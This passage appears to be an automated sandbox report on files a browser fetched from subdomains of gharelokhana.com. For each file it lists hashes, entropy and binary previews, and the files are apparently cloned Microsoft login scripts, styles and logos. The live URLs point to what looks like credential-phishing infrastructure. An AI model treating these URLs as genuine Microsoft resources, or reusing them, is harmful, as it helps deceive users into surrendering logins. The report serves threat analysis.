                                                                                                                                                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 15768
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5538
                                                                                                                                                                                                Entropy (8bit):7.960199579905109
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:whCVXNOo3nAv0SIPouFHQ4uQxsZ51rT18Ps8RLTJZctq5/+XVGbN6o91UwSuaGwg:NdOa8APoAQusbT1v8RtutveNR/aGJ
                                                                                                                                                                                                MD5:D63B348D234F84AA9D51C5EDE29E2B6E
                                                                                                                                                                                                SHA1:AF30AFBFC6DC69C80B42637E7B5A149F58F80071
                                                                                                                                                                                                SHA-256:E552737337424A3E33E655698E3D7DF6DFDAD588A44BE35E3723AC5FF694F881
                                                                                                                                                                                                SHA-512:2B3C92D4B4E106AD8E16F96DC46E9C368F41B2311A641E9510CB842E84037EEB87C2F6FEC74B84B6CE29C94F9427289D4F61057AAAB93B525206A8D437336F94
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........[}w.F...?.b.(..c.i....8zI..k..f...$F.1.. ........$!..=.13w..s./>.w........u{g.=...u.....>h./{.F..xhS..7.6....9p...(.D..a..Q.\hS.L|7.FI4.....$....._.X4.At..@.x...s.seZ.....!V..x..'..F.?..z.[..Ppm.z<..'.p.]..$..(..>...6.3..o.47..6..t...AfX..F.($8...= ...'..GDb<.iM..s.D....N..F.<.e.......M....t ...Sk.'wDb.h...M2K...... ..6N.X.o..s...S.....r.`......1..4.c...J....V....ED.7.........p......&i....p....O.. ....k......+p..-N....|..E...q.v5.....M]?.7.*_Eg.*...U.._.(RYZ.._U!]9..q..D..bwx....;.c.............g.....h...X.g!....s..."<.M..qd2..oM.f...I.F.=.-..7.9.9...'.n.@.X..+.4.R.M.y.y..',.lg.z...k.fA...B.@..,..;.'9.Z.....!.b..,_..17L.:.R.4.........yL\,..g.tr...A.p$n....S..q..E.......P.#.....pvE.d.....F...x...,`c.V...,~....">....%yu..h'.i..>.g.Nj.I.._.u.{..!..]...F...1.aP4..6./.$8..m..K...D.m.q....$.......XSb6k..+......9.....=?...5.e.?.`.wjp.QQjC6..<...=..CJ7`.A.d....1O....._..0..)....v.d......anSc.i..z..8NR.7N.N..{...q..,yBV;2
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 449946
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):122350
                                                                                                                                                                                                Entropy (8bit):7.997491782139407
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:1536:rYyMpVPDHa0FrNEEwrvJrsPMcKEfdEF/WA/IaYK+uVspvENa+onokczG2SRhog1p:rEaqX0+dtfdEF/gvu9onCzWBAZ/mq2F
                                                                                                                                                                                                MD5:62B841D84F5F497856BA738982343E92
                                                                                                                                                                                                SHA1:8243AE7EADF3402046BA438CF25C402008935CA2
                                                                                                                                                                                                SHA-256:BCE59813ED316C15727064D2B4FAA183FACC111A7EA1BBAB4CA56488DBC1B4BA
                                                                                                                                                                                                SHA-512:8D4D495A459BDE1CB675FABD8647546D2C74AF7EBF9FBDF6F47927D762E3B8497C7CA9F34686D7D43B73651D3FD7F8973EEE99A7DD744CB39E14F796BF9DB300
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js
                                                                                                                                                                                                Preview:...........{W.8.....{_&.L:.....t...C.g...,.V......;.|._UI.....u...G.K.W.T.*.J.~...J?.v..?..u..48)].>.:*]..?K...............4.|V..#;fn).JaT..'.fad',.M.....8....fQ.'s...{q..F...Ke..rK.v...N/+U..Am.......^..CR...sX..\... f.y....9..s..8.'..9.{.F.9...Kv.J1KJ.0J.x?..!B.Zcj....8t..s..1.....z!vq6.Ac.0._.J'....>......E..x...x.....g.A...Ts.Y.]..R..Q...c.K.e....Z.Dv.(.......)........Mg....^bq..f......U%..J..aP..........vkF.g=$.,6?|.x..|T.<.........N?..|..1..y.....1.\.....g.qf.r>.......Ku*NsSq).b.S!..`..b9.8....\+........Ye!...r._aT~.a&tO...v.G...c..;...~.1..,.$....N....N..p.U...0y.......@..eU. ...{..m....v..y.P..h........H..KQ.....,.........no.0.}G...T..o..+..R..Z,u.Z.fm...!D4x.w..U"......@..*.}*ma....@..-C...b.......>&..........U..'...G^.....E.......7...)..h.[..(..b.$.....=..!.8..y.:K.. ...k...C..G.F!.^L....G>.*...J..G.9..X7*..@L.L...h-.p..%R?.>e.......=....@O..*....w/.....2....5..T.......R........hY...~T...Z.....s.c..\|.zmO..)+k..Up.)#
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 113809
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):35203
                                                                                                                                                                                                Entropy (8bit):7.99318141450381
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:768:WvEsQ9nnq7Qszq35Hi4Sbt5o2xZHr6BrXFC8FIbdTdqh4d79:Nq7I5C5tC2xZLwrXFvFVidZ
                                                                                                                                                                                                MD5:5982C7D6031F70FB99DDFAE7C93CFDF3
                                                                                                                                                                                                SHA1:7B4898C2301DC22ACFB25AD99A53A3C2D49681D5
                                                                                                                                                                                                SHA-256:5EC47B9AAC91BE24922FB7A4965AE8604DF005B88B9E2C957B9D4878779311CD
                                                                                                                                                                                                SHA-512:4A6A45D426599B16EA353EF48357BFDBD9AFD198930236AFC0CE8D50BD9EF919A2DB020A5850CF17E3F02A8EB83771008A5DD1938412ED27403872ECB7EB13FA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....pk2..&..4..[a:....I..0...F:....7?o..s..L.....!..v..x.;~+..3.o.T.......B........R......7.|..u...Ax.7 .b..v..v.m-...~v...:....r..._......v.,...A.......:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'..QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Wu. ..e6_.o..*.w...>...:.....k~...~..&E._..}}.}%[. ..#......z.5M.b.....z....H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h.......dE...&.0Dv.....u.^.</.y...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, original size modulo 2^32 3651
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1435
                                                                                                                                                                                                Entropy (8bit):7.860223690068481
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                                                                                                                                                                                MD5:DF6A7721C242813411CC6950DF40F9B3
                                                                                                                                                                                                SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                                                                                                                                                                                SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                                                                                                                                                                                SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, original size modulo 2^32 1592
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):621
                                                                                                                                                                                                Entropy (8bit):7.6770058072183405
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                                                                                                                                                                                SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                                                                                                                                                                                SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                                                                                                                                                                                SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 15768
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):5538
                                                                                                                                                                                                Entropy (8bit):7.960199579905109
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:whCVXNOo3nAv0SIPouFHQ4uQxsZ51rT18Ps8RLTJZctq5/+XVGbN6o91UwSuaGwg:NdOa8APoAQusbT1v8RtutveNR/aGJ
                                                                                                                                                                                                MD5:D63B348D234F84AA9D51C5EDE29E2B6E
                                                                                                                                                                                                SHA1:AF30AFBFC6DC69C80B42637E7B5A149F58F80071
                                                                                                                                                                                                SHA-256:E552737337424A3E33E655698E3D7DF6DFDAD588A44BE35E3723AC5FF694F881
                                                                                                                                                                                                SHA-512:2B3C92D4B4E106AD8E16F96DC46E9C368F41B2311A641E9510CB842E84037EEB87C2F6FEC74B84B6CE29C94F9427289D4F61057AAAB93B525206A8D437336F94
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                                                                                                                                                                                Preview:...........[}w.F...?.b.(..c.i....8zI..k..f...$F.1.. ........$!..=.13w..s./>.w........u{g.=...u.....>h./{.F..xhS..7.6....9p...(.D..a..Q.\hS.L|7.FI4.....$....._.X4.At..@.x...s.seZ.....!V..x..'..F.?..z.[..Ppm.z<..'.p.]..$..(..>...6.3..o.47..6..t...AfX..F.($8...= ...'..GDb<.iM..s.D....N..F.<.e.......M....t ...Sk.'wDb.h...M2K...... ..6N.X.o..s...S.....r.`......1..4.c...J....V....ED.7.........p......&i....p....O.. ....k......+p..-N....|..E...q.v5.....M]?.7.*_Eg.*...U.._.(RYZ.._U!]9..q..D..bwx....;.c.............g.....h...X.g!....s..."<.M..qd2..oM.f...I.F.=.-..7.9.9...'.n.@.X..+.4.R.M.y.y..',.lg.z...k.fA...B.@..,..;.'9.Z.....!.b..,_..17L.:.R.4.........yL\,..g.tr...A.p$n....S..q..E.......P.#.....pvE.d.....F...x...,`c.V...,~....">....%yu..h'.i..>.g.Nj.I.._.u.{..!..]...F...1.aP4..6./.$8..m..K...D.m.q....$.......XSb6k..+......9.....=?...5.e.?.`.wjp.QQjC6..<...=..CJ7`.A.d....1O....._..0..)....v.d......anSc.i..z..8NR.7N.N..{...q..,yBV;2
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2279
                                                                                                                                                                                                Entropy (8bit):7.354295352983905
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                                                                                                                                                                                MD5:7E0D59593F3377B72C29435C4B43954A
                                                                                                                                                                                                SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                                                                                                                                                                                SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                                                                                                                                                                                SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):2279
                                                                                                                                                                                                Entropy (8bit):7.354295352983905
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                                                                                                                                                                                MD5:7E0D59593F3377B72C29435C4B43954A
                                                                                                                                                                                                SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                                                                                                                                                                                SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                                                                                                                                                                                SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                                                                                Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 113378
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):20400
                                                                                                                                                                                                Entropy (8bit):7.980283616044888
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:BRvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGGwDO8Ua:Bpmm7ZFM+ObGGUIjN5PJV3PDDUa
                                                                                                                                                                                                MD5:D5B89CEEC2B024C565802C0E51607044
                                                                                                                                                                                                SHA1:74696825D59F384D3D874638537BB4920FDB60CB
                                                                                                                                                                                                SHA-256:05DC99C6E0751D3A98E970F628C8426A967CF068A4BD681BDBAF6F627D54C7E2
                                                                                                                                                                                                SHA-512:BB683A290B2F506A413BAADCA020A9716299221746B3E6A0D4C9F4BA481B3605F2911C1011F60F0D38D155F8086C3AF51F21D8C0164ECCB911B4531983C544E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                                                                                                                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 142331
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):49934
                                                                                                                                                                                                Entropy (8bit):7.995474321848419
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:768:wo1WK2TpRa/jXAAOY0tKABr4bO2TL2Ma6x357WDmI/pIZ4wg1gt/Tg6LpDlnsAAB:OTpRuAAOQI4bOqL2uX5vg1ga6FeXxDQa
                                                                                                                                                                                                MD5:55CB2F3B65B11F71B131817106F4B64A
                                                                                                                                                                                                SHA1:286A08FBCBF8A9C76E60D0A76CCBB45D3A422AEB
                                                                                                                                                                                                SHA-256:D0ED9B708A681925423907A15F8938DED57DCF1DB0C238D8855188F10BC8276C
                                                                                                                                                                                                SHA-512:4C587EDE61B097516E113109009584CEA040D1D5DC3119A407383E36329AF59294DA28A085C53178A0EEF6C3788976BDA8745219E4E6FB8889AE5BFD2AAF1953
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://e7a91062-5bf3911d.gharelokhana.com/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                                                                                Preview:...........m[.8.0........OL....;w.....a.L...\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De....q.W.~.@......*T.y.S7J.*..f...P....Pz.......a.E..<.m./A,*...Q.....U..q...$.Db,...H<...'....J,..$..;nG.2DHYkL../......=.pB....A?.&...i,......2lo...$.<.s...?~p[......L..&x.qR.u3...6q:....U.Y1.."... .>Un#7@.........."H,@.......?..P....p6.S.[...E].A..G.....q..j4w6......YwI2....[?....w..i......8...........So....d.K.1....|...........Cq...S5............r.......d...aUa>..JRM.-...nT.....qm....b.a...N..OEp..u.Z...2...#d.:.B.&O3Q.s..c.(.........Z....^F.....l..U...bZ..4:....?T.k.PeU\....L.a..>..t.......jV...B.i7....>b..T....D2...>.f.)...v0.y....kMKf..EG..X.....V`e../Sg...->.Vh}.....R..^..OZF.|i.(..#..1... P8!^3...$] .+..".........lM.'..!...(...T.l.;...$D%N .)..#O.V...'r\.... ...&....J|."Nd%D:uw6.>U.+...H&.Z...T=.&U.v....J.t.0%+...U..3M....y...L......p='.....?%...x:woO.{Q5..0....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 449946
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):122350
                                                                                                                                                                                                Entropy (8bit):7.997491782139407
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:1536:rYyMpVPDHa0FrNEEwrvJrsPMcKEfdEF/WA/IaYK+uVspvENa+onokczG2SRhog1p:rEaqX0+dtfdEF/gvu9onCzWBAZ/mq2F
                                                                                                                                                                                                MD5:62B841D84F5F497856BA738982343E92
                                                                                                                                                                                                SHA1:8243AE7EADF3402046BA438CF25C402008935CA2
                                                                                                                                                                                                SHA-256:BCE59813ED316C15727064D2B4FAA183FACC111A7EA1BBAB4CA56488DBC1B4BA
                                                                                                                                                                                                SHA-512:8D4D495A459BDE1CB675FABD8647546D2C74AF7EBF9FBDF6F47927D762E3B8497C7CA9F34686D7D43B73651D3FD7F8973EEE99A7DD744CB39E14F796BF9DB300
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........{W.8.....{_&.L:.....t...C.g...,.V......;.|._UI.....u...G.K.W.T.*.J.~...J?.v..?..u..48)].>.:*]..?K...............4.|V..#;fn).JaT..'.fad',.M.....8....fQ.'s...{q..F...Ke..rK.v...N/+U..Am.......^..CR...sX..\... f.y....9..s..8.'..9.{.F.9...Kv.J1KJ.0J.x?..!B.Zcj....8t..s..1.....z!vq6.Ac.0._.J'....>......E..x...x.....g.A...Ts.Y.]..R..Q...c.K.e....Z.Dv.(.......)........Mg....^bq..f......U%..J..aP..........vkF.g=$.,6?|.x..|T.<.........N?..|..1..y.....1.\.....g.qf.r>.......Ku*NsSq).b.S!..`..b9.8....\+........Ye!...r._aT~.a&tO...v.G...c..;...~.1..,.$....N....N..p.U...0y.......@..eU. ...{..m....v..y.P..h........H..KQ.....,.........no.0.}G...T..o..+..R..Z,u.Z.fm...!D4x.w..U"......@..*.}*ma....@..-C...b.......>&..........U..'...G^.....E.......7...)..h.[..(..b.$.....=..!.8..y.:K.. ...k...C..G.F!.^L....G>.*...J..G.9..X7*..@L.L...h-.p..%R?.>e.......=....@O..*....w/.....2....5..T.......R........hY...~T...Z.....s.c..\|.zmO..)+k..Up.)#
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, original size modulo 2^32 3651
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1435
                                                                                                                                                                                                Entropy (8bit):7.860223690068481
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                                                                                                                                                                                MD5:DF6A7721C242813411CC6950DF40F9B3
                                                                                                                                                                                                SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                                                                                                                                                                                SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                                                                                                                                                                                SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://82ce8558-5bf3911d.gharelokhana.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
